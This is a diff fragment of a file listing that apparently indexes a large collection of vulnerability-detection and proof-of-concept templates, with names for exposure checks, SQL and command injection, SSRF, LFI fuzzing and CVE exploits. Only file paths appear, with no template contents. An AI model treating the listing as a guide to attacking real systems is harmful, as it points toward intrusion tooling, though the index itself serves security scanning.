./poc/exposed/setup-page-exposure-10180.yaml
-./poc/exposed/setup-page-exposure-10181.yaml
./poc/exposed/setup-page-exposure-2.yaml
./poc/exposed/setup-page-exposure-3.yaml
./poc/exposed/setup-page-exposure-4.yaml
@@ -46429,12 +46403,12 @@
./poc/exposed/sftp-credentials-exposure-2.yaml
./poc/exposed/smf-path-disclosure.yaml
./poc/exposed/snyk-ignore-file-disclosure-10346.yaml
+./poc/exposed/snyk-ignore-file-disclosure-10347.yaml
./poc/exposed/snyk-ignore-file-disclosure-10348.yaml
-./poc/exposed/snyk-ignore-file-disclosure-10349.yaml
./poc/exposed/snyk-ignore-file-disclosure.yaml
./poc/exposed/solr-exposure-10363.yaml
+./poc/exposed/solr-exposure-10364.yaml
./poc/exposed/solr-exposure-10365.yaml
-./poc/exposed/solr-exposure-10366.yaml
./poc/exposed/solr-exposure.yaml
./poc/exposed/solr-panel-exposure.yaml
./poc/exposed/sonarqube-config-exposure.yml
@@ -46452,12 +46426,11 @@
./poc/exposed/thinkphp-509-information-disclosure-10752.yaml
./poc/exposed/thinkphp-509-information-disclosure-10753.yaml
./poc/exposed/thinkphp-509-information-disclosure-10754.yaml
-./poc/exposed/thinkphp-509-information-disclosure-10755.yaml
./poc/exposed/thinkphp-509-information-disclosure.yaml
./poc/exposed/thumbs-db-disclosure-10760.yaml
./poc/exposed/thumbs-db-disclosure-10761.yaml
./poc/exposed/thumbs-db-disclosure-10762.yaml
-./poc/exposed/thumbs-db-disclosure.yaml
+./poc/exposed/thumbs-db-disclosure-10763.yaml
./poc/exposed/titannit-web-exposure.yaml
./poc/exposed/tomcat-cookie-exposed.yaml
./poc/exposed/tomcat-exposed-docs.yaml
@@ -46471,9 +46444,8 @@
./poc/exposed/travis-ci-disclosure.yaml
./poc/exposed/truffle-config-exposure.yaml
./poc/exposed/tugboat-config-exposure-10841.yaml
-./poc/exposed/tugboat-config-exposure-10842.yaml
+./poc/exposed/tugboat-config-exposure-10843.yaml
./poc/exposed/tugboat-config-exposure-10844.yaml
-./poc/exposed/tugboat-config-exposure.yaml
./poc/exposed/typea-ftc-disclosure-76c6b84ccd9f6bd60eada03675ff7bce.yaml
./poc/exposed/typea-ftc-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/exposed/typea-ftc-disclosure.yaml
@@ -46485,8 +46457,8 @@
./poc/exposed/vpc-endpoint-exposed.yaml
./poc/exposed/wallet-recovery-phrase-disclosure.yml
./poc/exposed/watchguard-credentials-disclosure-11105.yaml
-./poc/exposed/watchguard-credentials-disclosure-11106.yaml
./poc/exposed/watchguard-credentials-disclosure-11107.yaml
+./poc/exposed/watchguard-credentials-disclosure.yaml
./poc/exposed/weaver_e_cology9_Information_disclosure.yaml
./poc/exposed/webmin-config-exposure.yml
./poc/exposed/wordpress-config-disclosure.yaml
@@ -46495,8 +46467,8 @@
./poc/exposed/wordpress-wp-config-exposure.yml
./poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml
./poc/exposed/wordpress-wpcourses-info-disclosure-11368.yaml
+./poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml
./poc/exposed/wordpress-wpcourses-info-disclosure-11370.yaml
-./poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml
./poc/exposed/wordpress-wpcourses-info-disclosure.yaml
./poc/exposed/wp-affiliate-disclosure-047309c077ef8436ac32af01d6e52b55.yaml
./poc/exposed/wp-affiliate-disclosure-10a22924ce2a012a99f4110178fc4e04.yaml
@@ -46506,16 +46478,16 @@
./poc/exposed/wp-affiliate-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/exposed/wp-affiliate-disclosure.yaml
./poc/exposed/wp-config.php-disclosure.yaml
+./poc/exposed/wp-full-path-disclosure-11455.yaml
./poc/exposed/wp-full-path-disclosure-11456.yaml
-./poc/exposed/wp-full-path-disclosure-11457.yaml
./poc/exposed/wp-full-path-disclosure.yaml
./poc/exposed/wp-mailchimp-log-exposure-11493.yaml
./poc/exposed/wp-mailchimp-log-exposure-11494.yaml
./poc/exposed/wpeprivate-config-disclosure.yaml
./poc/exposed/wpsensitiveinfo.yaml
./poc/exposed/x5engine-full-path-disclosure.yaml
+./poc/exposed/yarn-manager-exposure-11731.yaml
./poc/exposed/yarn-manager-exposure-11732.yaml
-./poc/exposed/yarn-manager-exposure-11733.yaml
./poc/exposed/yarn-manager-exposure.yaml
./poc/exposed/yonyou-nc-wsncapplet-disclosure.yaml
./poc/exposed/yyoa-a6-userinfo-disclosure.yaml
@@ -46524,8 +46496,8 @@
./poc/exposed/zenphoto-installation-sensitive-info-2.yaml
./poc/exposed/zenphoto-installation-sensitive-info-3.yaml
./poc/exposed/zenphoto-installation-sensitive-info-4.yaml
-./poc/exposed/zenphoto-installation-sensitive-info.yaml
./poc/exposed/zenphoto-sensitive-info-1.yaml
+./poc/exposed/zenphoto-sensitive-info-11784.yaml
./poc/exposed/zenphoto-sensitive-info-2.yaml
./poc/exposed/zenphoto-sensitive-info-3.yaml
./poc/exposed/zenphoto-sensitive-info-4.yaml
@@ -46543,6 +46515,7 @@
./poc/extract/extract-firebase-database.yaml
./poc/extract/extract-urls-7368.yaml
./poc/extract/extract-urls-7369.yaml
+./poc/extract/extract-urls-7370.yaml
./poc/extract/extract-urls.yaml
./poc/extract/extract.yaml
./poc/extract/extractor-bitcoin.yaml
@@ -46578,7 +46551,6 @@
./poc/favicon/favicon-by-realfavicongenerator-e94e235c33e1a3c3c8b84ec6688a2709.yaml
./poc/favicon/favicon-by-realfavicongenerator.yaml
./poc/favicon/favicon-detect.yaml
-./poc/favicon/favicon-detection-7441.yaml
./poc/favicon/favicon-detection-7442.yaml
./poc/favicon/favicon-detection-7443.yaml
./poc/favicon/favicon-detection-7445.yaml
@@ -46602,11 +46574,14 @@
./poc/ftp/aws-sftp-detect.yaml
./poc/ftp/crush-ftp-detect-1270.yaml
./poc/ftp/crush-ftp-detect-1271.yaml
+./poc/ftp/crush-ftp-detect-1272.yaml
./poc/ftp/crush-ftp-detect.yaml
./poc/ftp/crush-ftp-login-1273.yaml
./poc/ftp/crush-ftp-login-1274.yaml
+./poc/ftp/crush-ftp-login-1275.yaml
./poc/ftp/crush-ftp-login.yaml
./poc/ftp/crushftp-anonymous-login.yaml
+./poc/ftp/crushftp-default-login.yaml
./poc/ftp/dahua-smart-park-deleteftp-rce.yaml
./poc/ftp/dionaea-ftp-honeypot-detect.yaml
./poc/ftp/dionaea-ftp-honeypot-detection.yaml
@@ -46614,14 +46589,13 @@
./poc/ftp/ftp-access.yaml
./poc/ftp/ftp-anonymous-login.yaml
./poc/ftp/ftp-credentials-exposure-7567.yaml
-./poc/ftp/ftp-credentials-exposure-7568.yaml
+./poc/ftp/ftp-credentials-exposure.yaml
./poc/ftp/ftp-default-credentials.yaml
./poc/ftp/ftp-default-creds.yaml
./poc/ftp/ftp-weak-credentials-7569.yaml
-./poc/ftp/ftp-weak-credentials-7570.yaml
./poc/ftp/ftp-weak-credentials.yaml
+./poc/ftp/ftpconfig-7565.yaml
./poc/ftp/ftpconfig-7566.yaml
-./poc/ftp/ftpconfig.yaml
./poc/ftp/gnu-inetutils-ftpd-detect.yaml
./poc/ftp/mainwp-updraftplus-extension-32da2ccdaaac8b19165da0cc67dc1c8d.yaml
./poc/ftp/mainwp-updraftplus-extension-3642dbf393631c48d93989f2e01cf01e.yaml
@@ -46684,7 +46658,6 @@
./poc/ftp/unauth-ftp-10939.yaml
./poc/ftp/unauth-ftp-10940.yaml
./poc/ftp/unauth-ftp-10941.yaml
-./poc/ftp/unauth-ftp-10942.yaml
./poc/ftp/unauth-ftp.yaml
./poc/ftp/unrestricted-sg-ingress-ftp-port.yaml
./poc/ftp/updraftplus-132b1db14c9aafb4ccfc0ec8e04b9e98.yaml
@@ -46720,15 +46693,14 @@
./poc/ftp/updraftplus.yaml
./poc/ftp/vmware-ftp-server.yaml
./poc/ftp/vsftpd-backdoor.yaml
-./poc/ftp/vsftpd-detection-11073.yaml
./poc/ftp/vsftpd-detection-11074.yaml
+./poc/ftp/vsftpd-detection-11075.yaml
./poc/ftp/vsftpd-detection-11076.yaml
./poc/ftp/vsftpd-detection.yaml
./poc/ftp/wanhu-ezoffice-download-ftp-jsp-filedownload.yaml
./poc/ftp/wanhu-oa-download-ftp-file-read.yaml
./poc/ftp/wanhuOA-download-ftp.yaml
./poc/ftp/web-ftp-detect-11135.yaml
-./poc/ftp/web-ftp-detect-11136.yaml
./poc/ftp/web-ftp-detect-11137.yaml
./poc/ftp/web-ftp-detect-11138.yaml
./poc/ftp/wing-ftp-detect.yaml
@@ -46764,6 +46736,7 @@
./poc/fuzz/generic-lfi-fuzzing.yaml
./poc/fuzz/get_fuzzing.yaml
./poc/fuzz/lfi-fuzz.yaml
+./poc/fuzz/lfi-linux-fuzz.yaml
./poc/fuzz/linux-lfi-fuzz.yaml
./poc/fuzz/linux-lfi-fuzzing.yaml
./poc/fuzz/log4j-fuzz-head-poc-v1.yaml
@@ -46785,7 +46758,7 @@
./poc/fuzz/xss-fuzz.yaml
./poc/fuzz/xss-fuzz.yml
./poc/fuzz/xss_fuzzer.yaml
-./poc/gcloud/GCP-service-account.yaml
+./poc/gcloud/GCP-service-account (copy 1).yaml
./poc/gcloud/cloud-enum-gcp-app-engine.yaml
./poc/gcloud/cloud-enum-gcp-bucket.yaml
./poc/gcloud/cloud-enum-gcp-firebase-app.yaml
@@ -46796,6 +46769,7 @@
./poc/gcloud/gcp-bucket-enum.yaml
./poc/gcloud/gcp-firebase-app-enum.yaml
./poc/gcloud/gcp-firebase-rtdb-enum.yaml
+./poc/gcloud/gcp-service-account-11851.yaml
./poc/gcloud/gcp-service-account-7575.yaml
./poc/gcloud/gcp-service-account.yaml
./poc/gcloud/nktagcloud-a8e6501893b16cbc2185c791f71d5631.yaml
@@ -46823,8 +46797,8 @@
./poc/git/api-gitlab.yml
./poc/git/axiom-digitalocean-key-exposure-665.yaml
./poc/git/axiom-digitalocean-key-exposure-666.yaml
-./poc/git/axiom-digitalocean-key-exposure-667.yaml
./poc/git/axiom-digitalocean-key-exposure-668.yaml
+./poc/git/axiom-digitalocean-key-exposure.yaml
./poc/git/cgit.yaml
./poc/git/custom-dot-git-detect.yaml
./poc/git/digital-agency-lite-1d0d069f8e40de9d56d2bab8f8887bf2.yaml
@@ -46923,7 +46897,6 @@
./poc/git/exposed-gitignore-2.yaml
./poc/git/exposed-gitignore-3.yaml
./poc/git/exposed-gitignore-7302.yaml
-./poc/git/exposed-gitignore-7303.yaml
./poc/git/exposed-gitignore-7304.yaml
./poc/git/exposed-gitignore-7306.yaml
./poc/git/exposed-gitlab-ci-config.yaml
@@ -46931,6 +46904,7 @@
./poc/git/exposed-gitworkflows.yaml
./poc/git/git-config-7633.yaml
./poc/git/git-config-7634.yaml
+./poc/git/git-config-7635.yaml
./poc/git/git-config-7636.yaml
./poc/git/git-config-7637.yaml
./poc/git/git-config-7638.yaml
@@ -46943,9 +46917,10 @@
./poc/git/git-config-nginxoffbyslash-5.yaml
./poc/git/git-config-nginxoffbyslash-6.yaml
./poc/git/git-config-nginxoffbyslash-7.yaml
+./poc/git/git-config-nginxoffbyslash-7628.yaml
./poc/git/git-config-nginxoffbyslash-7629.yaml
+./poc/git/git-config-nginxoffbyslash-7630.yaml
./poc/git/git-config-nginxoffbyslash-7631.yaml
-./poc/git/git-config-nginxoffbyslash-7632.yaml
./poc/git/git-config-nginxoffbyslash-8.yaml
./poc/git/git-config-nginxoffbyslash-9.yaml
./poc/git/git-config-nginxoffbyslash.yaml
@@ -46953,8 +46928,9 @@
./poc/git/git-credentials-7643.yaml
./poc/git/git-credentials-7644.yaml
./poc/git/git-credentials-disclosure-7639.yaml
-./poc/git/git-credentials-disclosure-7640.yaml
+./poc/git/git-credentials-disclosure-7641.yaml
./poc/git/git-credentials-disclosure-7642.yaml
+./poc/git/git-credentials-disclosure.yaml
./poc/git/git-credentials.yaml
./poc/git/git-exposure.yaml
./poc/git/git-folder.yaml
@@ -46975,6 +46951,7 @@
./poc/git/gitbook-detect-7624.yaml
./poc/git/gitbook-detect-7625.yaml
./poc/git/gitbook-takeover-7626.yaml
+./poc/git/gitbook-takeover-7627.yaml
./poc/git/gitbook-takeover.yaml
./poc/git/gitbook.yaml
./poc/git/gitbucket.yaml
@@ -46990,15 +46967,18 @@
./poc/git/github-app-token.yaml
./poc/git/github-enterprise-detect-7647.yaml
./poc/git/github-enterprise-detect-7648.yaml
+./poc/git/github-enterprise-detect-7649.yaml
./poc/git/github-enterprise-detect-7650.yaml
./poc/git/github-enterprise-detect-7651.yaml
./poc/git/github-enterprise-detect.yaml
./poc/git/github-gemfile-files-1.yaml
./poc/git/github-gemfile-files-2.yaml
./poc/git/github-gemfile-files-7652.yaml
+./poc/git/github-gemfile-files-7653.yaml
./poc/git/github-login-check.yaml
./poc/git/github-oauth-token.yaml
./poc/git/github-outdated-key.yaml
+./poc/git/github-page-config-7654.yaml
./poc/git/github-page-config-7655.yaml
./poc/git/github-page-config-7656.yaml
./poc/git/github-personal-token.yaml
@@ -47031,8 +47011,8 @@
./poc/git/github-workflows-disclosure-5.yaml
./poc/git/github-workflows-disclosure-6.yaml
./poc/git/github-workflows-disclosure-7.yaml
+./poc/git/github-workflows-disclosure-7664.yaml
./poc/git/github-workflows-disclosure-7665.yaml
-./poc/git/github-workflows-disclosure-7666.yaml
./poc/git/github-workflows-disclosure-8.yaml
./poc/git/github-workflows-disclosure-9.yaml
./poc/git/github-workflows-disclosure.yaml
@@ -47061,10 +47041,8 @@
./poc/git/gitlab-public-repos-7678.yaml
./poc/git/gitlab-public-repos-7679.yaml
./poc/git/gitlab-public-repos-7680.yaml
-./poc/git/gitlab-public-repos.yaml
./poc/git/gitlab-public-signup-7681.yaml
./poc/git/gitlab-public-signup-7682.yaml
-./poc/git/gitlab-public-signup-7683.yaml
./poc/git/gitlab-public-signup-7684.yaml
./poc/git/gitlab-public-signup.yaml
./poc/git/gitlab-public-snippets-1.yaml
@@ -47102,7 +47080,6 @@
./poc/git/gitlab-weak-login-7705.yaml
./poc/git/gitlab-weak-login-7706.yaml
./poc/git/gitlab-weak-login-7707.yaml
-./poc/git/gitlab-weak-login.yaml
./poc/git/gitlab-workflow-7708.yaml
./poc/git/gitleak.yaml
./poc/git/gitlist-disclosure.yaml
@@ -47129,7 +47106,6 @@
./poc/git/woo-checkout-for-digital-goods-c4950da5cbd10141c56c420499671594.yaml
./poc/git/woo-checkout-for-digital-goods.yaml
./poc/git/wordpress-git-config-1.yaml
-./poc/git/wordpress-git-config-11278.yaml
./poc/git/wordpress-git-config-11279.yaml
./poc/git/wordpress-git-config-2.yaml
./poc/git/wp-githuber-md-3d4ca604f74dfc99007278807d75f075.yaml
@@ -47154,7 +47130,7 @@
./poc/google/address-autocomplete-using-google-place-api-plugin.yaml
./poc/google/address-autocomplete-using-google-place-api.yaml
./poc/google/ads-malware-google.yaml
-./poc/google/api-google-drive.yaml
+./poc/google/api-google-drive-432.yaml
./poc/google/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml
./poc/google/api-key-for-google-maps.yaml
./poc/google/bwp-google-xml-sitemaps-b789bd36fd13df2696b89e73e738641b.yaml
@@ -47330,6 +47306,7 @@
./poc/google/google-earth-dlogin-7778.yaml
./poc/google/google-earth-dlogin-7779.yaml
./poc/google/google-earth-dlogin-7780.yaml
+./poc/google/google-earth-dlogin-7781.yaml
./poc/google/google-earth-dlogin-7782.yaml
./poc/google/google-earth-dlogin.yaml
./poc/google/google-earthenterprise-weak-password.yaml
@@ -47438,6 +47415,7 @@
./poc/google/google-places-reviews-a9b6955a2812b2fe0a13ae0f0752d58f.yaml
./poc/google/google-places-reviews.yaml
./poc/google/google-safebrowsing.yaml
+./poc/google/google-secrets.yaml
./poc/google/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml
./poc/google/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml
./poc/google/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -47469,6 +47447,7 @@
./poc/google/google-sitemap-plugin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/google/google-sitemap-plugin-plugin.yaml
./poc/google/google-sitemap-plugin.yaml
+./poc/google/google-storage-7788.yaml
./poc/google/google-storage-7789.yaml
./poc/google/google-storage-7790.yaml
./poc/google/google-storage-7791.yaml
@@ -47828,15 +47807,15 @@
./poc/graphql/graphql-8.yaml
./poc/graphql/graphql-9.yaml
./poc/graphql/graphql-alias-batching-7826.yaml
-./poc/graphql/graphql-alias-batching.yaml
./poc/graphql/graphql-apiforwp-detect.yaml
./poc/graphql/graphql-apollo-detect.yaml
./poc/graphql/graphql-ariadne-detect.yaml
./poc/graphql/graphql-array-batching-7827.yaml
./poc/graphql/graphql-array-batching-7828.yaml
+./poc/graphql/graphql-array-batching.yaml
./poc/graphql/graphql-depth-limit.yaml
./poc/graphql/graphql-detect-7829.yaml
-./poc/graphql/graphql-detect-7831.yaml
+./poc/graphql/graphql-detect-7830.yaml
./poc/graphql/graphql-detect-7832.yaml
./poc/graphql/graphql-detect.yaml
./poc/graphql/graphql-dianajl-detect.yaml
@@ -47845,7 +47824,6 @@
./poc/graphql/graphql-flutter-detect.yaml
./poc/graphql/graphql-get-method-7835.yaml
./poc/graphql/graphql-get-method-7836.yaml
-./poc/graphql/graphql-get-method.yaml
./poc/graphql/graphql-go-detect.yaml
./poc/graphql/graphql-gqlgen-detect.yaml
./poc/graphql/graphql-graphene-detect.yaml
@@ -47869,6 +47847,7 @@
./poc/graphql/hasura-graphql-psql-exec-7902.yaml
./poc/graphql/hasura-graphql-ssrf-7903.yaml
./poc/graphql/hasura-graphql-ssrf-7904.yaml
+./poc/graphql/hasura-graphql-ssrf-7905.yaml
./poc/graphql/hasura-graphql-ssrf-7906.yaml
./poc/graphql/hasura-graphql-ssrf.yaml
./poc/graphql/hidden-graphql-endpoint-discovery.yaml
@@ -47940,6 +47919,7 @@
./poc/header/header-blind-time-sql-injection.yaml
./poc/header/header-command-injection-7917.yaml
./poc/header/header-command-injection-7918.yaml
+./poc/header/header-command-injection-7919.yaml
./poc/header/header-command-injection-7920.yaml
./poc/header/header-command-injection.yaml
./poc/header/header-enhancement-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml
@@ -47974,10 +47954,8 @@
./poc/header/hidden-data-in-headers.yaml
./poc/header/hidden-http-header-injection.yaml
./poc/header/host-header-auth-bypass.yaml
-./poc/header/host-header-injection-8000.yaml
./poc/header/host-header-injection-8002.yaml
./poc/header/host-header-injection.yaml
-./poc/header/host-header-poisoning.yaml
./poc/header/hostheaderpoisoning.yaml
./poc/header/http-cache-header.yaml
./poc/header/http-cors-header.yaml
@@ -47988,7 +47966,6 @@
./poc/header/http-headers-a66a555d9e5fa4a2bb41c853ef9462e9.yaml
./poc/header/http-headers.yaml
./poc/header/http-missing-security-headers-8058.yaml
-./poc/header/http-missing-security-headers.yaml
./poc/header/http-xframe-header.yaml
./poc/header/insert-headers-and-footers-07e3cd9581f59ebebf0ea2afde0b3b69.yaml
./poc/header/insert-headers-and-footers-7d5f28d00d66d203ff5a11666d3be6e5.yaml
@@ -47996,11 +47973,14 @@
./poc/header/insert-headers-and-footers.yaml
./poc/header/jenkins-headers-detect.yaml
./poc/header/jfrog-version-header.yaml
+./poc/header/log4j-header.yaml
./poc/header/maxforwards-headers-detect.yaml
./poc/header/missing-hsts-header.yaml
./poc/header/null-auth-header-auth-bypass.yaml
./poc/header/oob-header-based-interaction-9248.yaml
./poc/header/oob-header-based-interaction-9249.yaml
+./poc/header/oob-header-based-interaction-9250.yaml
+./poc/header/oob-header-based-interaction.yaml
./poc/header/pearl-header-builder-2ad1e0994a7bb85ac431ac6afa84db60.yaml
./poc/header/pearl-header-builder-a51f1388039630606710e61f15390639.yaml
./poc/header/pearl-header-builder.yaml
@@ -48009,7 +47989,6 @@
./poc/header/responsive-header-image-slider.yaml
./poc/header/splash-header-ae1af7b8de10cb8ae21a4838e673d47b.yaml
./poc/header/splash-header.yaml
-./poc/header/sqli_header-10504.yaml
./poc/header/sqli_header.yaml
./poc/header/sqliheader.yaml
./poc/header/sticky-header-effects-for-elementor.yaml
@@ -48043,7 +48022,6 @@
./poc/http/apache-httpd-cve-2021-40438-ssrf.yml
./poc/http/apache-httpd-cve-2021-41773-path-traversal.yml
./poc/http/apache-httpd-cve-2021-41773-rce.yml
-./poc/http/apache-httpd-rce-362.yaml
./poc/http/apache-httpd-rce-363.yaml
./poc/http/apache-httpd-rce.yaml
./poc/http/axtls-embad-httpd.yaml
@@ -48051,11 +48029,9 @@
./poc/http/basic_http.yaml
./poc/http/cl-http.yaml
./poc/http/cl-te-http-request-smuggling.yaml
-./poc/http/cl-te-http-smuggling.yaml
./poc/http/crystal-live-http-server-lfi.yaml
./poc/http/default-ibm-http-server-6856.yaml
./poc/http/default-ibm-http-server.yaml
-./poc/http/default-lighttpd-page-6866.yaml
./poc/http/default-lighttpd-page-6867.yaml
./poc/http/detect-dns-over-https-6969.yaml
./poc/http/detect-dns-over-https.yaml
@@ -48083,7 +48059,6 @@
./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml
./poc/http/http-https-remover.yaml
./poc/http/http-missing-security-headers-8058.yaml
-./poc/http/http-missing-security-headers.yaml
./poc/http/http-multiple-matcher-condition.yaml
./poc/http/http-multiple-matcher.yaml
./poc/http/http-paths.yaml
@@ -48091,22 +48066,21 @@
./poc/http/http-trace.yaml
./poc/http/http-username-password.yaml
./poc/http/http-value-share-template-1.yaml
+./poc/http/http-value-share-template-2.yaml
./poc/http/http-verb-tampering.yaml
./poc/http/http-xframe-header.yaml
./poc/http/httpbin-detection.yaml
./poc/http/httpbin-detection.yml
./poc/http/httpbin-open-redirect-8048.yaml
./poc/http/httpbin-open-redirect-8049.yaml
-./poc/http/httpbin-open-redirect.yaml
./poc/http/httpbin-open-redirect.yml
./poc/http/httpbin-panel-8050.yaml
-./poc/http/httpbin-panel-8051.yaml
./poc/http/httpbin-panel.yaml
./poc/http/httpbin-xss-8052.yaml
./poc/http/httpbin-xss-8053.yaml
./poc/http/httpbin-xss.yml
./poc/http/httpd-config-8054.yaml
-./poc/http/httpd-config.yaml
+./poc/http/httpd-config-8055.yaml
./poc/http/httpfs.yaml
./poc/http/httponly-cookie-detect.yaml
./poc/http/https-to-http-redirect.yaml
@@ -48116,7 +48090,6 @@
./poc/http/ibm-http-server-8095.yaml
./poc/http/ibm-http-server-8096.yaml
./poc/http/ibm-http-server-8097.yaml
-./poc/http/ibm-http-server.yaml
./poc/http/iis-enum-httpapi.yaml
./poc/http/knopflerfish-http-server.yaml
./poc/http/lighttpd-default-8627.yaml
@@ -48135,6 +48108,7 @@
./poc/http/oracle-http-server-12c-9381.yaml
./poc/http/oracle-http-server-12c-9382.yaml
./poc/http/oracle-http-server-12c-9383.yaml
+./poc/http/oracle-http-server-12c-9384.yaml
./poc/http/oracle-http-server-12c.yaml
./poc/http/oracle-httpserver12c.yaml
./poc/http/rmihttpserver.yaml
@@ -48161,8 +48135,8 @@
./poc/ibm/IBM-Signup-Exposure.yaml
./poc/ibm/default-ibm-http-server-6856.yaml
./poc/ibm/default-ibm-http-server.yaml
+./poc/ibm/ibm-advanced-system-management-8088.yaml
./poc/ibm/ibm-advanced-system-management-8089.yaml
-./poc/ibm/ibm-advanced-system-management-8090.yaml
./poc/ibm/ibm-advanced-system-management-8091.yaml
./poc/ibm/ibm-advanced-system-management.yaml
./poc/ibm/ibm-app-connect-login.yaml
@@ -48193,7 +48167,6 @@
./poc/ibm/ibm-http-server-8095.yaml
./poc/ibm/ibm-http-server-8096.yaml
./poc/ibm/ibm-http-server-8097.yaml
-./poc/ibm/ibm-http-server.yaml
./poc/ibm/ibm-imm.yaml
./poc/ibm/ibm-infoprint-directory-traversal-8098.yaml
./poc/ibm/ibm-infoprint-directory-traversal-8099.yaml
@@ -48219,8 +48192,8 @@
./poc/ibm/ibm-mqseries.yaml
./poc/ibm/ibm-note-login-1.yaml
./poc/ibm/ibm-note-login-2.yaml
-./poc/ibm/ibm-note-login-8110.yaml
./poc/ibm/ibm-note-login-8111.yaml
+./poc/ibm/ibm-note-login-8112.yaml
./poc/ibm/ibm-note-login.yaml
./poc/ibm/ibm-odm-detect.yaml
./poc/ibm/ibm-odm-panel.yaml
@@ -48230,7 +48203,6 @@
./poc/ibm/ibm-security-access-manager.yaml
./poc/ibm/ibm-service-assistant-8116.yaml
./poc/ibm/ibm-service-assistant-8117.yaml
-./poc/ibm/ibm-service-assistant-8118.yaml
./poc/ibm/ibm-service-assistant.yaml
./poc/ibm/ibm-signup-exposure-8119.yaml
./poc/ibm/ibm-signup-exposure-8120.yaml
@@ -48276,8 +48248,9 @@
./poc/injection/beescms_v3-login-sql-injection.yaml
./poc/injection/biometric-data-injection-registration.yaml
./poc/injection/biometric-data-injection.yaml
-./poc/injection/buffalo-config-injection-798.yaml
./poc/injection/buffalo-config-injection-799.yaml
+./poc/injection/buffalo-config-injection-800.yaml
+./poc/injection/buffalo-config-injection-801.yaml
./poc/injection/buffalo-config-injection.yaml
./poc/injection/chanjet-crm-get-usedspace-sql-injection.yaml
./poc/injection/cmseasy-crossall-act-php-sql-injection.yaml
@@ -48290,6 +48263,7 @@
./poc/injection/crlf-injection-1.yaml
./poc/injection/crlf-injection-1260.yaml
./poc/injection/crlf-injection-1261.yaml
+./poc/injection/crlf-injection-1262.yaml
./poc/injection/crlf-injection-1263.yaml
./poc/injection/crlf-injection-1264.yaml
./poc/injection/crlf-injection-1265.yaml
@@ -48316,7 +48290,9 @@
./poc/injection/drupal_module-social-sql-injection.yaml
./poc/injection/duomicms-sql-injection-7122.yaml
./poc/injection/duomicms-sql-injection-7123.yaml
+./poc/injection/duomicms-sql-injection-7124.yaml
./poc/injection/duomicms-sql-injection-7125.yaml
+./poc/injection/duomicms-sql-injection.yaml
./poc/injection/error-based-get-sql-injection.yaml
./poc/injection/error-based-post-sql-injection.yaml
./poc/injection/error-based-sql-injection-7249.yaml
@@ -48328,17 +48304,18 @@
./poc/injection/fuzzing-xss-get-params-html-injection.yaml
./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml
./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml
+./poc/injection/glpi-9.3.3-sql-injection.yaml
./poc/injection/header-blind-sql-injection.yaml
./poc/injection/header-blind-time-sql-injection.yaml
./poc/injection/header-command-injection-7917.yaml
./poc/injection/header-command-injection-7918.yaml
+./poc/injection/header-command-injection-7919.yaml
./poc/injection/header-command-injection-7920.yaml
./poc/injection/header-command-injection.yaml
./poc/injection/header-injection.yaml
./poc/injection/hidden-command-injection.yaml
./poc/injection/hidden-http-header-injection.yaml
./poc/injection/hidden-ldap-injection.yaml
-./poc/injection/host-header-injection-8000.yaml
./poc/injection/host-header-injection-8002.yaml
./poc/injection/host-header-injection.yaml
./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml
@@ -48480,6 +48457,7 @@
./poc/java/default-glassfish-server-page-6854.yaml
./poc/java/default-glassfish-server-page-6855.yaml
./poc/java/default-glassfish-server-page.yaml
+./poc/java/default-jetty-page-6862.yaml
./poc/java/default-jetty-page-6863.yaml
./poc/java/default-jetty-page-6864.yaml
./poc/java/default-jetty-page-6865.yaml
@@ -48489,12 +48467,13 @@
./poc/java/e-cology-springframework-directory-traversal.yaml
./poc/java/ecology-javabeanshell-rce.yaml
./poc/java/ecology-springframework-directory-traversal-7174.yaml
-./poc/java/ecology-springframework-directory-traversal-7175.yaml
+./poc/java/ecology-springframework-directory-traversal.yaml
./poc/java/ecology-springframework-directory-traversal.yml
./poc/java/ecology-springframework-directoryTraversal.yaml
./poc/java/exposed-alps-spring-1.yaml
./poc/java/exposed-alps-spring-2.yaml
./poc/java/exposed-alps-spring-3.yaml
+./poc/java/exposed-alps-spring-7283.yaml
./poc/java/exposed-alps-spring-7284.yaml
./poc/java/exposed-alps-spring-7285.yaml
./poc/java/exposed-alps-spring.yaml
@@ -48521,6 +48500,7 @@
./poc/java/java-melody-xss-8225.yaml
./poc/java/java-melody-xss-8226.yaml
./poc/java/java-melody-xss.yaml
+./poc/java/java-rmi-detect-8227.yaml
./poc/java/java-rmi-detect-8228.yaml
./poc/java/java-rmi-detect.yaml
./poc/java/javamelody-detect.yaml
@@ -48537,7 +48517,7 @@
./poc/java/jboss-as.yaml
./poc/java/jboss-cve-2010-1871.yml
./poc/java/jboss-default-password.yaml
-./poc/java/jboss-detect.yaml
+./poc/java/jboss-detect-8237.yaml
./poc/java/jboss-eap.yaml
./poc/java/jboss-jbpm-admin.yaml
./poc/java/jboss-juddi.yaml
@@ -48556,17 +48536,16 @@
./poc/java/jetty-information-disclosure.yaml
./poc/java/jetty-showcontexts-enable-8295.yaml
./poc/java/jetty-showcontexts-enable-8296.yaml
-./poc/java/jetty-showcontexts-enable-8297.yaml
./poc/java/jetty-showcontexts-enable.yaml
./poc/java/jetty-workflow.yaml
./poc/java/jetty.yaml
-./poc/java/jinfornet-jreport-lfi-8308.yaml
+./poc/java/jinfornet-jreport-lfi-8307.yaml
./poc/java/jinfornet-jreport-lfi-8309.yaml
./poc/java/jinfornet-jreport-lfi-8310.yaml
./poc/java/jinfornet-jreport-lfi.yaml
./poc/java/jolokia-tomcat-creds-leak.yaml
./poc/java/jsf-detection-8396.yaml
-./poc/java/jsf-detection-8397.yaml
+./poc/java/jsf-detection-8398.yaml
./poc/java/jsf-detection.yaml
./poc/java/jsf.yaml
./poc/java/jsp-source-code-vulnerabilities.yaml
@@ -48592,7 +48571,6 @@
